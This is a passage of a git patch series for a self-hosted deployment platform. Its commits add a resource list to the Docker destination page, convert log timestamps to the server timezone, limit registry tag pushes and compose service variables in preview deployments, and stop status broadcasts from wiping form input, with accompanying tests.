+            $this->destination->clickhouses,
+        ]);
+    }
+
+    protected function collectResources(array $groups): array
+    {
+        $rows = [];
+        foreach ($groups as $group) {
+            foreach ($group as $resource) {
+                $rows[] = $this->resourceRow($resource);
+            }
+        }
+
+        return $rows;
+    }
+
+    protected function resourceRow($resource): array
+    {
+        $type = match (true) {
+            $resource instanceof \App\Models\Application => 'application',
+            $resource instanceof \App\Models\Service => 'service',
+            default => 'database',
+        };
+        $environment = $resource->environment;
+        $project = $environment?->project;
+        $routeName = "project.{$type}.configuration";
+        $url = ($project && $environment)
+            ? route($routeName, [
+                'project_uuid' => $project->uuid,
+                'environment_uuid' => $environment->uuid,
+                "{$type}_uuid" => $resource->uuid,
+            ])
+            : null;
+
+        return [
+            'type' => $type,
+            'name' => $resource->name,
+            'project' => $project?->name,
+            'environment' => $environment?->name,
+            'url' => $url,
+        ];
+    }
+
     public function syncData(bool $toModel = false)
     {
         if ($toModel) {
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index d6b4d1a1c..d12a15a7c 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -134,8 +134,11 @@ public function databases()
         $mongodbs = $this->mongodbs;
         $mysqls = $this->mysqls;
         $mariadbs = $this->mariadbs;
+        $keydbs = $this->keydbs;
+        $dragonflies = $this->dragonflies;
+        $clickhouses = $this->clickhouses;
 
-        return $postgresqls->concat($redis)->concat($mongodbs)->concat($mysqls)->concat($mariadbs);
+        return $postgresqls->concat($redis)->concat($mongodbs)->concat($mysqls)->concat($mariadbs)->concat($keydbs)->concat($dragonflies)->concat($clickhouses);
     }
 
     public function attachedTo()
diff --git a/resources/views/livewire/destination/show.blade.php b/resources/views/livewire/destination/show.blade.php
index 27260e920..1bb179823 100644
--- a/resources/views/livewire/destination/show.blade.php
+++ b/resources/views/livewire/destination/show.blade.php
@@ -28,4 +28,24 @@
             @endif
         </div>
     </form>
+
+    @if ($destination->getMorphClass() === 'App\Models\StandaloneDocker')
+        <div class="pt-6">
+            <h3>Resources</h3>
+            <div class="pb-2 text-xs opacity-70">Applications, services, and databases deployed to this network.</div>
+            @if (count($resources) === 0)
+                <div class="text-xs opacity-70 pt-2">No resources are using this destination.</div>
+            @else
+                <div class="grid grid-cols-1 md:grid-cols-2 gap-2 pt-2">
+                    @foreach ($resources as $row)
+                        <a href="{{ $row['url'] }}"
+                            class="relative flex flex-col dark:text-white coolbox group cursor-pointer">
+                            <div class="box-title">{{ ucfirst($row['type']) }}: {{ $row['name'] }}</div>
+                            <div class="box-description">{{ $row['project'] }} / {{ $row['environment'] }}</div>
+                        </a>
+                    @endforeach
+                </div>
+            @endif
+        </div>
+    @endif
 </div>

From bf10b45bbc576f917e0913fb7d5504121d87bbf3 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 13 May 2026 01:48:14 +0530
Subject: [PATCH 13/90] fix(logs): convert timestamps to server timezone in
 deployment and container logs

---
 bootstrap/helpers/remoteProcess.php           | 11 ++++++--
 .../project/shared/get-logs.blade.php         | 25 +++++++++----------
 2 files changed, 21 insertions(+), 15 deletions(-)

diff --git a/bootstrap/helpers/remoteProcess.php b/bootstrap/helpers/remoteProcess.php
index 2544719fc..bd7689335 100644
--- a/bootstrap/helpers/remoteProcess.php
+++ b/bootstrap/helpers/remoteProcess.php
@@ -200,6 +200,7 @@ function decode_remote_command_output(?ApplicationDeploymentQueue $application_d
     }
     $application = Application::find(data_get($application_deployment_queue, 'application_id'));
     $is_debug_enabled = data_get($application, 'settings.is_debug_enabled');
+    $serverTimezone = getServerTimezone(data_get($application, 'destination.server'));
 
     $logs = data_get($application_deployment_queue, 'logs');
     if (empty($logs)) {
@@ -240,8 +241,14 @@ function decode_remote_command_output(?ApplicationDeploymentQueue $application_d
 
     return $formatted
         ->sortBy(fn ($i) => data_get($i, 'order'))
-        ->map(function ($i) {
-            data_set($i, 'timestamp', Carbon::parse(data_get($i, 'timestamp'))->format('Y-M-d H:i:s.u'));
+        ->map(function ($i) use ($serverTimezone) {
+            $timestamp = Carbon::parse(data_get($i, 'timestamp'));
+            try {
+                $timestamp->setTimezone($serverTimezone);
+            } catch (\Exception) {
+                $timestamp->setTimezone('UTC');
+            }
+            data_set($i, 'timestamp', $timestamp->format('Y-M-d H:i:s.u'));
 
             return $i;
         })
diff --git a/resources/views/livewire/project/shared/get-logs.blade.php b/resources/views/livewire/project/shared/get-logs.blade.php
index 4ef77081e..c47b1b4c5 100644
--- a/resources/views/livewire/project/shared/get-logs.blade.php
+++ b/resources/views/livewire/project/shared/get-logs.blade.php
@@ -520,20 +520,19 @@ class="text-gray-500 dark:text-gray-400 py-2">
                                     // Parse timestamp from log line (ISO 8601 format: 2025-12-04T11:48:39.136764033Z)
                                     $timestamp = '';
                                     $logContent = $line;
-                                    if (preg_match('/^(\d{4})-(\d{2})-(\d{2})T(\d{2}:\d{2}:\d{2})(?:\.(\d+))?Z?\s(.*)$/', $line, $matches)) {
-                                        $year = $matches[1];
-                                        $month = $matches[2];
-                                        $day = $matches[3];
-                                        $time = $matches[4];
-                                        $microseconds = isset($matches[5]) ? substr($matches[5], 0, 6) : '000000';
-                                        $logContent = $matches[6];
+                                    if (preg_match('/^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?Z?\s(.*)$/', $line, $matches)) {
+                                        $microseconds = isset($matches[2]) ? substr($matches[2], 0, 6) : '000000';
+                                        $logContent = $matches[3];
 
-                                        // Convert month number to abbreviated name
-                                        $monthNames = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];
-                                        $monthName = $monthNames[(int)$month - 1] ?? $month;
-
-                                        // Format for display: 2025-Dec-04 09:44:58
-                                        $timestamp = "{$year}-{$monthName}-{$day} {$time}";
+                                        // Convert UTC Docker timestamp to server timezone for display
+                                        $carbonTs = \Carbon\Carbon::parse($matches[1], 'UTC');
+                                        $serverTz = getServerTimezone($server);
+                                        try {
+                                            $carbonTs->setTimezone($serverTz);
+                                        } catch (\Exception) {
+                                            // keep UTC
+                                        }
+                                        $timestamp = $carbonTs->format('Y-M-d H:i:s');
                                         // Include microseconds in key for uniqueness
                                         $lineKey = "{$timestamp}.{$microseconds}";
                                     }

From a54e70b4e08bec81266ca759a2db17c31cd46dc1 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 13 May 2026 11:49:15 +0200
Subject: [PATCH 14/90] fix(deployments): skip registry image tag for previews

Only push the configured Docker registry image tag for production deployments, and cover preview and missing-tag cases with unit tests.
---
 app/Jobs/ApplicationDeploymentJob.php         | 11 +++-
 .../DockerImagePreviewTagResolutionTest.php   | 57 +++++++++++++++++++
 2 files changed, 67 insertions(+), 1 deletion(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2e43456b8..5e554eb03 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1106,7 +1106,7 @@ private function push_to_docker_registry()
                     'hidden' => true,
                 ],
             );
-            if ($this->application->docker_registry_image_tag) {
+            if ($this->shouldPushDockerRegistryImageTag()) {
                 // Tag image with docker_registry_image_tag
                 $this->application_deployment_queue->addLogEntry("Tagging and pushing image with {$this->application->docker_registry_image_tag} tag.");
                 $this->execute_remote_command(
@@ -1130,6 +1130,15 @@ private function push_to_docker_registry()
         }
     }
 
+    private function shouldPushDockerRegistryImageTag(): bool
+    {
+        if (blank($this->application->docker_registry_image_tag)) {
+            return false;
+        }
+
+        return $this->pull_request_id === 0;
+    }
+
     private function generate_image_names()
     {
         if ($this->application->dockerfile) {
diff --git a/tests/Unit/DockerImagePreviewTagResolutionTest.php b/tests/Unit/DockerImagePreviewTagResolutionTest.php
index e6d0b6a4e..17f7d7b9b 100644
--- a/tests/Unit/DockerImagePreviewTagResolutionTest.php
+++ b/tests/Unit/DockerImagePreviewTagResolutionTest.php
@@ -74,3 +74,60 @@
 
     expect($method->invoke($job))->toBe('latest');
 });
+
+function makeDockerRegistryTagPushJob(int $pullRequestId, ?string $dockerRegistryImageTag): object
+{
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = $reflection->newInstanceWithoutConstructor();
+
+    $pullRequestProperty = $reflection->getProperty('pull_request_id');
+    $pullRequestProperty->setAccessible(true);
+    $pullRequestProperty->setValue($job, $pullRequestId);
+
+    $applicationProperty = $reflection->getProperty('application');
+    $applicationProperty->setAccessible(true);
+    $applicationProperty->setValue($job, new Application([
+        'docker_registry_image_tag' => $dockerRegistryImageTag,
+    ]));
+
+    return $job;
+}
+
+it('pushes the configured docker registry image tag for production deployments', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = makeDockerRegistryTagPushJob(
+        pullRequestId: 0,
+        dockerRegistryImageTag: 'latest',
+    );
+
+    $method = $reflection->getMethod('shouldPushDockerRegistryImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBeTrue();
+});
+
+it('skips the configured docker registry image tag for preview deployments', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = makeDockerRegistryTagPushJob(
+        pullRequestId: 42,
+        dockerRegistryImageTag: 'latest',
+    );
+
+    $method = $reflection->getMethod('shouldPushDockerRegistryImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBeFalse();
+});
+
+it('skips pushing a configured docker registry image tag when no tag is set', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = makeDockerRegistryTagPushJob(
+        pullRequestId: 0,
+        dockerRegistryImageTag: null,
+    );
+
+    $method = $reflection->getMethod('shouldPushDockerRegistryImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBeFalse();
+});

From d1126c02a9d88d0537566208105005de81afb210 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 13 May 2026 11:59:45 +0200
Subject: [PATCH 15/90] fix(deployments): filter generated compose service env
 vars

Exclude generated Docker Compose SERVICE_FQDN, SERVICE_URL, and SERVICE_NAME variables from runtime, build-time, and build arg environments so stale stored values cannot override generated service names for preview deployments.
---
 app/Jobs/ApplicationDeploymentJob.php         |  37 ++++--
 ...ationDeploymentControlVarFilteringTest.php | 121 ++++++++++++++++++
 2 files changed, 144 insertions(+), 14 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2e43456b8..ac24f3cc6 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1293,12 +1293,8 @@ private function generate_runtime_environment_variables()
             $sorted_environment_variables_preview = $this->application->runtime_environment_variables_preview->sortBy('id');
         }
         if ($this->build_pack === 'dockercompose') {
-            $sorted_environment_variables = $sorted_environment_variables->filter(function ($env) {
-                return ! str($env->key)->startsWith('SERVICE_FQDN_') && ! str($env->key)->startsWith('SERVICE_URL_') && ! str($env->key)->startsWith('SERVICE_NAME_');
-            });
-            $sorted_environment_variables_preview = $sorted_environment_variables_preview->filter(function ($env) {
-                return ! str($env->key)->startsWith('SERVICE_FQDN_') && ! str($env->key)->startsWith('SERVICE_URL_') && ! str($env->key)->startsWith('SERVICE_NAME_');
-            });
+            $sorted_environment_variables = $sorted_environment_variables->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
+            $sorted_environment_variables_preview = $sorted_environment_variables_preview->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
         }
         $ports = $this->application->main_port();
         $coolify_envs = $this->generate_coolify_env_variables();
@@ -1451,6 +1447,15 @@ private function generate_runtime_environment_variables()
         return $envs;
     }
 
+    private function isGeneratedDockerComposeEnvironmentVariable(EnvironmentVariable $environmentVariable): bool
+    {
+        $key = str($environmentVariable->key);
+
+        return $key->startsWith('SERVICE_FQDN_')
+            || $key->startsWith('SERVICE_URL_')
+            || $key->startsWith('SERVICE_NAME_');
+    }
+
     private function save_runtime_environment_variables()
     {
         // This method saves the .env file with ALL runtime variables
@@ -1666,11 +1671,9 @@ private function generate_buildtime_environment_variables()
                 ->orderBy($this->application->settings->is_env_sorting_enabled ? 'key' : 'id')
                 ->get();
 
-            // For Docker Compose, filter out SERVICE_FQDN and SERVICE_URL as we generate these
+            // For Docker Compose, filter out generated SERVICE_* variables as we generate these
             if ($this->build_pack === 'dockercompose') {
-                $sorted_environment_variables = $sorted_environment_variables->filter(function ($env) {
-                    return ! str($env->key)->startsWith('SERVICE_FQDN_') && ! str($env->key)->startsWith('SERVICE_URL_');
-                });
+                $sorted_environment_variables = $sorted_environment_variables->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
             }
 
             foreach ($sorted_environment_variables as $env) {
@@ -1719,11 +1722,9 @@ private function generate_buildtime_environment_variables()
                 ->orderBy($this->application->settings->is_env_sorting_enabled ? 'key' : 'id')
                 ->get();
 
-            // For Docker Compose, filter out SERVICE_FQDN and SERVICE_URL as we generate these with PR-specific values
+            // For Docker Compose, filter out generated SERVICE_* variables as we generate these with PR-specific values
             if ($this->build_pack === 'dockercompose') {
-                $sorted_environment_variables = $sorted_environment_variables->filter(function ($env) {
-                    return ! str($env->key)->startsWith('SERVICE_FQDN_') && ! str($env->key)->startsWith('SERVICE_URL_');
-                });
+                $sorted_environment_variables = $sorted_environment_variables->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
             }
 
             foreach ($sorted_environment_variables as $env) {
@@ -3019,6 +3020,10 @@ private function generate_env_variables()
                 ->where('is_buildtime', true)
                 ->get();
 
+            if ($this->build_pack === 'dockercompose') {
+                $envs = $envs->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
+            }
+
             foreach ($envs as $env) {
                 $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue)) {
@@ -3031,6 +3036,10 @@ private function generate_env_variables()
                 ->where('is_buildtime', true)
                 ->get();
 
+            if ($this->build_pack === 'dockercompose') {
+                $envs = $envs->reject(fn (EnvironmentVariable $env) => $this->isGeneratedDockerComposeEnvironmentVariable($env));
+            }
+
             foreach ($envs as $env) {
                 $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue)) {
diff --git a/tests/Feature/ApplicationDeploymentControlVarFilteringTest.php b/tests/Feature/ApplicationDeploymentControlVarFilteringTest.php
index d728f5ad7..83244c567 100644
--- a/tests/Feature/ApplicationDeploymentControlVarFilteringTest.php
+++ b/tests/Feature/ApplicationDeploymentControlVarFilteringTest.php
@@ -205,6 +205,127 @@ function readDeploymentJobProperty(object $job, ReflectionClass $reflection, str
     expect($buildtimeEnvs->contains(fn (string $env) => str($env)->startsWith('RAILPACK_NODE_VERSION=')))->toBeFalse();
 });
 
+it('does not let preview docker compose service names override generated build-time service names', function () {
+    $compose = <<<'YAML'
+services:
+  app:
+    image: nginx
+  postgresapp:
+    image: postgres:16-alpine
+YAML;
+
+    [$application, $server] = makeDeploymentControlVarFixture([
+        'build_pack' => 'dockercompose',
+        'docker_compose_raw' => $compose,
+        'docker_compose' => $compose,
+        'docker_compose_domains' => '[]',
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'SERVICE_NAME_POSTGRESAPP',
+        'value' => '',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'SERVICE_URL_APP',
+        'value' => '',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    [$job, $reflection] = makeControlVarFilteringJob($application, $server, [
+        'pull_request_id' => 241,
+    ]);
+
+    /** @var Collection $buildtimeEnvs */
+    $buildtimeEnvs = invokeDeploymentJobMethod($job, $reflection, 'generate_buildtime_environment_variables');
+    $envString = $buildtimeEnvs->implode("\n");
+
+    expect($envString)->toContain("SERVICE_NAME_POSTGRESAPP='postgresapp-pr-241'");
+    expect($envString)->not->toContain('SERVICE_NAME_POSTGRESAPP=""');
+    expect($envString)->not->toContain('SERVICE_URL_APP=');
+});
+
+it('does not let production docker compose service names override generated build-time service names', function () {
+    $compose = <<<'YAML'
+services:
+  app:
+    image: nginx
+  postgresapp:
+    image: postgres:16-alpine
+YAML;
+
+    [$application, $server] = makeDeploymentControlVarFixture([
+        'build_pack' => 'dockercompose',
+        'docker_compose_raw' => $compose,
+        'docker_compose' => $compose,
+        'docker_compose_domains' => '[]',
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'SERVICE_NAME_POSTGRESAPP',
+        'value' => 'stale-postgresapp',
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    [$job, $reflection] = makeControlVarFilteringJob($application, $server);
+
+    /** @var Collection $buildtimeEnvs */
+    $buildtimeEnvs = invokeDeploymentJobMethod($job, $reflection, 'generate_buildtime_environment_variables');
+    $envString = $buildtimeEnvs->implode("\n");
+
+    expect($envString)->toContain("SERVICE_NAME_POSTGRESAPP='postgresapp'");
+    expect($envString)->not->toContain('stale-postgresapp');
+});
+
+it('filters docker compose generated service variables from build args', function () {
+    [$application, $server] = makeDeploymentControlVarFixture([
+        'build_pack' => 'dockercompose',
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'APP_ENV',
+        'value' => 'production',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'SERVICE_NAME_POSTGRESAPP',
+        'value' => '',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    createApplicationEnvironmentVariable($application, [
+        'key' => 'SERVICE_URL_APP',
+        'value' => 'https://preview.example.com',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ]);
+
+    [$job, $reflection] = makeControlVarFilteringJob($application, $server, [
+        'pull_request_id' => 241,
+    ]);
+
+    invokeDeploymentJobMethod($job, $reflection, 'generate_env_variables');
+
+    /** @var Collection $envArgs */
+    $envArgs = readDeploymentJobProperty($job, $reflection, 'env_args');
+
+    expect($envArgs->get('APP_ENV'))->toBe('production');
+    expect($envArgs->has('SERVICE_NAME_POSTGRESAPP'))->toBeFalse();
+    expect($envArgs->has('SERVICE_URL_APP'))->toBeFalse();
+});
+
 it('filters buildpack control vars from preview runtime env fallback', function () {
     [$application, $server] = makeDeploymentControlVarFixture();
 

From b9f773c1d9d37eabee8778b04bbd5f2984ef7e3b Mon Sep 17 00:00:00 2001
From: Aditya Tripathi <aditya@climactic.co>
Date: Wed, 20 May 2026 19:04:43 +0000
Subject: [PATCH 16/90] fix(livewire): stop broadcast handlers from wiping
 in-progress form input

---
 .../Project/Application/Configuration.php     |  17 +-
 .../Project/Database/Clickhouse/General.php   |  13 ++
 .../Project/Database/Configuration.php        |  16 +-
 .../Project/Database/Dragonfly/General.php    |  15 +-
 app/Livewire/Project/Database/Import.php      |  54 +++---
 .../Project/Database/Keydb/General.php        |  15 +-
 .../Project/Database/Mariadb/General.php      |  15 +-
 .../Project/Database/Mongodb/General.php      |  15 +-
 .../Project/Database/Mysql/General.php        |  15 +-
 .../Project/Database/Postgresql/General.php   |  15 +-
 .../Project/Database/Redis/General.php        |  99 +----------
 .../Project/Database/Redis/StatusInfo.php     | 116 +++++++++++++
 .../Project/Service/Configuration.php         |  29 +---
 app/Livewire/Server/Sentinel.php              |   4 +-
 app/Livewire/Server/Show.php                  |  15 +-
 .../project/database/redis/general.blade.php  |  50 +-----
 .../database/redis/status-info.blade.php      |  51 ++++++
 .../Feature/DatabaseSslStatusRefreshTest.php  | 163 ++++++++++++++++--
 18 files changed, 470 insertions(+), 247 deletions(-)
 create mode 100644 app/Livewire/Project/Database/Redis/StatusInfo.php
 create mode 100644 resources/views/livewire/project/database/redis/status-info.blade.php

diff --git a/app/Livewire/Project/Application/Configuration.php b/app/Livewire/Project/Application/Configuration.php
index cc1bf15b9..887fff35a 100644
--- a/app/Livewire/Project/Application/Configuration.php
+++ b/app/Livewire/Project/Application/Configuration.php
@@ -17,17 +17,10 @@ class Configuration extends Component
 
     public $servers;
 
-    public function getListeners()
-    {
-        $teamId = auth()->user()->currentTeam()->id;
-
-        return [
-            "echo-private:team.{$teamId},ServiceChecked" => '$refresh',
-            "echo-private:team.{$teamId},ServiceStatusChanged" => '$refresh',
-            'buildPackUpdated' => '$refresh',
-            'refresh' => '$refresh',
-        ];
-    }
+    protected $listeners = [
+        'buildPackUpdated' => '$refresh',
+        'refresh' => '$refresh',
+    ];
 
     public function mount()
     {
@@ -51,8 +44,6 @@ public function mount()
         $this->environment = $environment;
         $this->application = $application;
 
-
-
         if ($this->application->build_pack === 'dockercompose' && $this->currentRoute === 'project.application.healthcheck') {
             return redirect()->route('project.application.configuration', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]);
         }
diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index 2583c10ea..edcb31f5e 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -48,13 +48,26 @@ class General extends Component
 
     public function getListeners()
     {
+        $userId = Auth::id();
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->dbUrl = $this->database->internal_db_url;
+        $this->dbUrlPublic = $this->database->external_db_url;
+    }
+
     public function mount()
     {
         try {
diff --git a/app/Livewire/Project/Database/Configuration.php b/app/Livewire/Project/Database/Configuration.php
index 7c64a6eef..9f952ff2b 100644
--- a/app/Livewire/Project/Database/Configuration.php
+++ b/app/Livewire/Project/Database/Configuration.php
@@ -2,8 +2,9 @@
 
 namespace App\Livewire\Project\Database;
 
-use Auth;
+use Illuminate\Auth\Access\AuthorizationException;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Support\ItemNotFoundException;
 use Livewire\Component;
 
 class Configuration extends Component
@@ -18,15 +19,6 @@ class Configuration extends Component
 
     public $environment;
 
-    public function getListeners()
-    {
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            "echo-private:team.{$teamId},ServiceChecked" => '$refresh',
-        ];
-    }
-
     public function mount()
     {
         try {
@@ -55,10 +47,10 @@ public function mount()
                 $this->dispatch('configurationChanged');
             }
         } catch (\Throwable $e) {
-            if ($e instanceof \Illuminate\Auth\Access\AuthorizationException) {
+            if ($e instanceof AuthorizationException) {
                 return redirect()->route('dashboard');
             }
-            if ($e instanceof \Illuminate\Support\ItemNotFoundException) {
+            if ($e instanceof ItemNotFoundException) {
                 return redirect()->route('dashboard');
             }
 
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index 9e1ea0d10..ae8ec9476 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -57,11 +57,22 @@ public function getListeners()
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            // Broadcasts go to refreshStatus, which only writes display-only properties.
+            // Never wire status broadcasts to a handler that touches text-input properties —
+            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
+    public function refreshStatus(): void
+    {
+        $this->database->refresh();
+        $this->dbUrl = $this->database->internal_db_url;
+        $this->dbUrlPublic = $this->database->external_db_url;
+        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+    }
+
     public function mount()
     {
         try {
diff --git a/app/Livewire/Project/Database/Import.php b/app/Livewire/Project/Database/Import.php
index 1cdc681cd..0c19709a5 100644
--- a/app/Livewire/Project/Database/Import.php
+++ b/app/Livewire/Project/Database/Import.php
@@ -5,9 +5,17 @@
 use App\Models\S3Storage;
 use App\Models\Server;
 use App\Models\Service;
+use App\Models\ServiceDatabase;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
 use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Illuminate\Support\Facades\Storage;
 use Livewire\Attributes\Computed;
 use Livewire\Attributes\Locked;
@@ -192,15 +200,9 @@ public function server()
         return Server::ownedByCurrentTeam()->find($this->serverId);
     }
 
-    public function getListeners()
-    {
-        $userId = Auth::id();
-
-        return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
-            'slideOverClosed' => 'resetActivityId',
-        ];
-    }
+    protected $listeners = [
+        'slideOverClosed' => 'resetActivityId',
+    ];
 
     public function resetActivityId()
     {
@@ -219,7 +221,7 @@ public function updatedDumpAll($value)
         $morphClass = $this->resource->getMorphClass();
 
         // Handle ServiceDatabase by checking the database type
-        if ($morphClass === \App\Models\ServiceDatabase::class) {
+        if ($morphClass === ServiceDatabase::class) {
             $dbType = $this->resource->databaseType();
             if (str_contains($dbType, 'mysql')) {
                 $morphClass = 'mysql';
@@ -231,7 +233,7 @@ public function updatedDumpAll($value)
         }
 
         switch ($morphClass) {
-            case \App\Models\StandaloneMariadb::class:
+            case StandaloneMariadb::class:
             case 'mariadb':
                 if ($value === true) {
                     $this->mariadbRestoreCommand = <<<'EOD'
@@ -247,7 +249,7 @@ public function updatedDumpAll($value)
                     $this->mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
                 }
                 break;
-            case \App\Models\StandaloneMysql::class:
+            case StandaloneMysql::class:
             case 'mysql':
                 if ($value === true) {
                     $this->mysqlRestoreCommand = <<<'EOD'
@@ -263,7 +265,7 @@ public function updatedDumpAll($value)
                     $this->mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
                 }
                 break;
-            case \App\Models\StandalonePostgresql::class:
+            case StandalonePostgresql::class:
             case 'postgresql':
                 if ($value === true) {
                     $this->postgresqlRestoreCommand = <<<'EOD'
@@ -321,7 +323,7 @@ public function getContainers()
         $this->resourceStatus = $resource->status ?? '';
 
         // Handle ServiceDatabase server access differently
-        if ($resource->getMorphClass() === \App\Models\ServiceDatabase::class) {
+        if ($resource->getMorphClass() === ServiceDatabase::class) {
             $server = $resource->service?->server;
             if (! $server) {
                 abort(404, 'Server not found for this service database.');
@@ -359,16 +361,16 @@ public function getContainers()
         }
 
         if (
-            $resource->getMorphClass() === \App\Models\StandaloneRedis::class ||
-            $resource->getMorphClass() === \App\Models\StandaloneKeydb::class ||
-            $resource->getMorphClass() === \App\Models\StandaloneDragonfly::class ||
-            $resource->getMorphClass() === \App\Models\StandaloneClickhouse::class
+            $resource->getMorphClass() === StandaloneRedis::class ||
+            $resource->getMorphClass() === StandaloneKeydb::class ||
+            $resource->getMorphClass() === StandaloneDragonfly::class ||
+            $resource->getMorphClass() === StandaloneClickhouse::class
         ) {
             $this->unsupported = true;
         }
 
         // Mark unsupported ServiceDatabase types (Redis, KeyDB, etc.)
-        if ($resource->getMorphClass() === \App\Models\ServiceDatabase::class) {
+        if ($resource->getMorphClass() === ServiceDatabase::class) {
             $dbType = $resource->databaseType();
             if (str_contains($dbType, 'redis') || str_contains($dbType, 'keydb') ||
                 str_contains($dbType, 'dragonfly') || str_contains($dbType, 'clickhouse')) {
@@ -664,7 +666,7 @@ public function restoreFromS3(string $password = ''): bool|string
             $fullImageName = "{$helperImage}:{$latestVersion}";
 
             // Get the database destination network
-            if ($this->resource->getMorphClass() === \App\Models\ServiceDatabase::class) {
+            if ($this->resource->getMorphClass() === ServiceDatabase::class) {
                 $destinationNetwork = $this->resource->service->destination->network ?? 'coolify';
             } else {
                 $destinationNetwork = $this->resource->destination->network ?? 'coolify';
@@ -756,7 +758,7 @@ public function buildRestoreCommand(string $tmpPath): string
         $morphClass = $this->resource->getMorphClass();
 
         // Handle ServiceDatabase by checking the database type
-        if ($morphClass === \App\Models\ServiceDatabase::class) {
+        if ($morphClass === ServiceDatabase::class) {
             $dbType = $this->resource->databaseType();
             if (str_contains($dbType, 'mysql')) {
                 $morphClass = 'mysql';
@@ -770,7 +772,7 @@ public function buildRestoreCommand(string $tmpPath): string
         }
 
         switch ($morphClass) {
-            case \App\Models\StandaloneMariadb::class:
+            case StandaloneMariadb::class:
             case 'mariadb':
